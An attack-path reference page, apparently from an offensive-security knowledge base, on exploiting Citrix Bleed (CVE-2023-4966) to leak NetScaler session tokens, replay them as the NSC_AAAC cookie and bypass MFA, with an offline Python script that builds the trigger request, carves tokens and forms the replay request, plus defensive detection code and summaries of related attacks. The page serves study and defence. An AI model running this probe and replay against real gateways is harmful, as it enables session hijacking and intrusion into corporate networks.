Citrix Bleed → steal authenticated session → MFA bypass
Send a request with an oversized Host header to a vulnerable NetScaler Gateway / AAA endpoint; the appliance answers with a slice of its own memory, which can contain the session token of a user who has already completed MFA. Replay that token as the session cookie to enter the corporate VPN portal without a password or a second factor.
§ Context
Assumed environment: target operates Citrix NetScaler ADC / Gateway with CVE-2023-4966 unpatched and configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server, the configurations Citrix's advisory lists as affected. At least one user with corporate access has authenticated recently and has a live session in memory, and the attacker can reach the appliance's external interface.
§ Steps
- 01 Identify NetScaler version (Reconnaissance: W-RECON-FINGERPRINT, Tech Stack Fingerprinting)
- 02 Trigger Citrix Bleed memory disclosure (Credential Access: VPN-CITRIX-BLEED, Citrix Bleed, CVE-2023-4966)
- 03 Parse leaked session token (Credential Access: T1539, Steal Web Session Cookie)
- 04 Replay token into authenticated portal (Lateral Movement: T1550.004, Use Alternate Authentication Material: Web Session Cookie)
- 05 Reach internal corporate apps (Initial Access: T1078, Valid Accounts)
- 06 Continue chain (BloodHound / Kerberoast) (Discovery: AD-BLOODHOUND, BloodHound / SharpHound Enumeration)
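Steps 02 through 04 as one worked example, added here and not taken from the dossier or from any published proof of concept: it builds the oversized-Host probe, carves candidate session tokens out of a constructed leak, and builds the replay request. The trigger path is the one publicly documented for CVE-2023-4966; the Host header length, the 65-character hex token shape, the post-login replay path and the sample response bytes are assumptions made for illustration. Nothing is sent over the network, so it runs offline.

```python
import re
from typing import List, Tuple

# Endpoint publicly documented as the CVE-2023-4966 trigger on NetScaler ADC / Gateway.
TRIGGER_PATH = "/oauth/idp/.well-known/openid-configuration"

# ASSUMPTION: public write-ups used a Host header of roughly 24 KB. The exact
# value that produces a leak is something to tune in a lab, never in production.
OVERSIZED_HOST_LEN = 24_812

# NSC_AAAC is the NetScaler AAA session cookie. ASSUMPTION: its leaked value is a
# 65-character lowercase hex string, which is what public PoC scripts pattern-match.
SESSION_COOKIE = "NSC_AAAC"
TOKEN_RE = re.compile(rb"(?<![0-9a-f])[0-9a-f]{65}(?![0-9a-f])")

# ASSUMPTION: a Gateway page that is only served to an authenticated session.
REPLAY_PATH = "/vpn/index.html"


def build_probe(host_len: int = OVERSIZED_HOST_LEN) -> bytes:
    """Raw HTTP/1.1 request whose only unusual feature is the oversized Host header."""
    host = "a" * host_len
    return (
        f"GET {TRIGGER_PATH} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def split_response(raw: bytes) -> Tuple[bytes, bytes]:
    """Separate the HTTP head from the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return head, body


def leaked_region(body: bytes) -> bytes:
    """The legitimate body is one flat JSON object; bytes after its closing brace
    are appliance memory that was never meant to be sent."""
    end = body.find(b"}")
    return body[end + 1:] if end != -1 else b""


def extract_tokens(body: bytes) -> List[str]:
    """Unique candidate session tokens from the leaked region, in order of appearance."""
    seen = set()
    out: List[str] = []
    for m in TOKEN_RE.finditer(leaked_region(body)):
        tok = m.group(0).decode("ascii")
        if tok not in seen:
            seen.add(tok)
            out.append(tok)
    return out


def build_replay(token: str, gateway_host: str, path: str = REPLAY_PATH) -> bytes:
    """Request that presents the stolen token as the session cookie: no password, no MFA."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {gateway_host}\r\n"
        f"Cookie: {SESSION_COOKIE}={token}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


# Constructed sample response (not a real capture): a valid JSON document followed
# by bytes standing in for leaked memory, holding one token twice and a 64-char decoy.
EXPECTED_TOKEN = "0123456789abcdef" * 4 + "f"   # 65 hex chars
DECOY = "f" * 64                                # one char short, must not match
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n"
    b'{"issuer":"https://' + b"a" * 40 + b'","authorization_endpoint":"https://'
    + b"a" * 40 + b'/oauth/idp/login"}'
    + b"\x00\x00\x7f\x01" + b"NSC_AAAC=" + EXPECTED_TOKEN.encode() + b";\x00\x00"
    + DECOY.encode() + b"\x00garbage\x00" + EXPECTED_TOKEN.encode() + b"\x00"
)


if __name__ == "__main__":
    print(f"probe size: {len(build_probe())} bytes")
    _, body = split_response(SAMPLE_RESPONSE)
    for tok in extract_tokens(body):
        print("candidate token:", tok)
        print(build_replay(tok, "gateway.example.com").decode())
```

Restricting the regex to the bytes after the JSON object matters: the JSON itself echoes the attacker-supplied hostname, which is a long run of hex-valid characters and would otherwise produce false candidates.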
§ References
- T1078 Valid Accounts
- T1550.004 Use Alternate Authentication Material: Web Session Cookie
- T1539 Steal Web Session Cookie
§ Frequently asked
- What is the "Citrix Bleed → steal authenticated session → MFA bypass" attack path?
- Send a request with an oversized Host header to a vulnerable NetScaler Gateway / AAA endpoint; the leaked memory can contain the session token of a user who has already passed MFA. Replay that token as the session cookie to enter the corporate VPN portal without a password or a second factor. It chains 6 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is Identify NetScaler version (W-RECON-FINGERPRINT), a reconnaissance primitive: confirm that the appliance is a NetScaler ADC / Gateway and that its build predates the fixed releases. Assumed environment: target operates Citrix NetScaler ADC / Gateway with CVE-2023-4966 unpatched, configured as a Gateway or AAA virtual server, and reachable from the attacker's position.
- What is the final impact of this kill-chain?
- The final step lands on Continue chain (BloodHound / Kerberoast) (AD-BLOODHOUND), which falls under Discovery: the replayed session gives the operator the same internal reach as the victim user, so the chain continues with Active Directory enumeration and service-ticket harvesting. From here, an operator typically pivots into post-exploitation or maintains persistence.
- How can defenders detect or prevent this attack?
- Patch to a fixed NetScaler build, then terminate every active and persistent session on the appliance: a token leaked before the patch stays valid until its session is killed, so patching alone does not close the path. Detection otherwise varies per step. At the appliance edge, alert on requests to the OpenID configuration endpoint that carry an abnormally long Host header, and on one session token appearing from more than one client address in a short window. For the downstream steps, refer to each linked MITRE ATT&CK entry under "References"; every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.
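The two edge-side checks above, run over constructed log lines as an added example (not the dossier's own tooling and not NetScaler's native ns.log format): an alert on oversized Host headers aimed at the trigger endpoint, and an alert on a session token reused from a second client address within a short window. The log format, the field names, the 1024-byte Host threshold and the 30-minute reuse window are assumptions; a real deployment would feed it from whatever reverse proxy, WAF or appliance syslog records the request path, Host header length and session identifier.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

TRIGGER_PATH = "/oauth/idp/.well-known/openid-configuration"
HOST_LEN_THRESHOLD = 1024            # ASSUMPTION: no legitimate Host header is this long
REUSE_WINDOW = timedelta(minutes=30)  # ASSUMPTION: tighter than a roaming user's address change

# ASSUMPTION: a front-end access-log line of the form
#   <iso timestamp> <src ip> "<method> <path>" host_len=<n> status=<n> session=<id or ->
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" '
    r'host_len=(?P<host_len>\d+) status=(?P<status>\d+) session=(?P<session>\S+)$'
)

# Constructed sample log (not a real capture). The session ids are illustrative:
# "beef" is a roaming user seen from two addresses hours apart (benign),
# "c0ffee" is a victim whose token reappears from the exploiting address seconds later.
SAMPLE_LOG = """\
2023-10-10T08:00:00Z 10.1.1.1 "GET /vpn/index.html" host_len=19 status=200 session=beef
2023-10-10T09:00:01Z 10.20.30.40 "GET /vpn/index.html" host_len=19 status=200 session=c0ffee
2023-10-10T09:00:05Z 198.51.100.7 "GET /oauth/idp/.well-known/openid-configuration" host_len=24812 status=200 session=-
2023-10-10T09:00:09Z 198.51.100.7 "GET /vpn/index.html" host_len=19 status=200 session=c0ffee
2023-10-10T09:00:20Z 10.20.30.41 "GET /vpn/index.html" host_len=19 status=200 session=d00d
2023-10-10T11:30:00Z 10.2.2.2 "GET /vpn/index.html" host_len=19 status=200 session=beef
"""


def parse_line(line: str) -> Optional[dict]:
    """One log line to a dict with typed timestamp and host length; None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    ev["host_len"] = int(ev["host_len"])
    return ev


def detect(log_text: str) -> List[Tuple]:
    """Return findings as tuples tagged 'oversized_host' or 'session_reuse'."""
    findings: List[Tuple] = []
    events = [ev for ev in (parse_line(l) for l in log_text.splitlines()) if ev]

    # Check 1: the exploit request itself, an oversized Host header at the trigger path.
    for ev in events:
        if ev["path"] == TRIGGER_PATH and ev["host_len"] >= HOST_LEN_THRESHOLD:
            findings.append(("oversized_host", ev["src"], ev["host_len"]))

    # Check 2: one session token presented by two client addresses close in time.
    last_seen: Dict[str, Dict[str, datetime]] = defaultdict(dict)  # session -> {src: last ts}
    flagged = set()
    for ev in sorted(events, key=lambda e: e["ts"]):
        sess = ev["session"]
        if sess == "-":
            continue
        for other_src, other_ts in last_seen[sess].items():
            if (other_src != ev["src"]
                    and ev["ts"] - other_ts <= REUSE_WINDOW
                    and (sess, ev["src"]) not in flagged):
                findings.append(("session_reuse", sess, other_src, ev["src"]))
                flagged.add((sess, ev["src"]))
        last_seen[sess][ev["src"]] = ev["ts"]
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f)
```

The reuse check is deliberately windowed: a VPN user who moves between networks will legitimately present one session from two addresses, but not seconds apart, and not immediately after an oversized-Host request from the second address. Correlating the two findings by source address is the strongest signal this log alone can give.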
§ Related dossiers
- Shared techniques: 3
F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB
Connection-header smuggle bypasses iControl REST auth, command-injection RCE as root. Load balancers see all traffic: recover TLS keys, session cookies, internal SSO config.
- Shared techniques: 3
Unconstrained delegation → Capture DC TGT → DCSync
Compromise a host with TRUSTED_FOR_DELEGATION, coerce a DC to authenticate to it, harvest the DC's TGT from its LSASS, then DCSync.
- Shared techniques: 2
5G core GTP-U user-plane injection → subscriber MITM
Attacker on a transit network between mobile-core hops (or with a compromised UPF). GTP-U packets are typically unfiltered between PEs; inject packets into subscriber bearers for credential capture, free-of-charge tunnels, and downstream attacks.
- Shared techniques: 2
Vesting beneficiary replace → silently drain stream
Bug in a custom vesting contract allows anyone to call setBeneficiary on existing schedules. Replace the beneficiary with an attacker address; the legitimate token stream now flows to the attacker until the missing funds are noticed.
- Shared techniques: 2
ERC-4337 paymaster sponsor drain
A paymaster sponsors all UserOperations without per-user gas accounting. Spam tiny UserOps from many bundled addresses; the paymaster pays the gas until its deposit hits zero.
- Shared techniques: 2
Leaked legacy VPN credential → ransomware (Colonial-class)
A dormant VPN account whose password appeared in a third-party breach is still active and has no MFA enforced. Sign in, recon AD, deploy ransomware across the estate.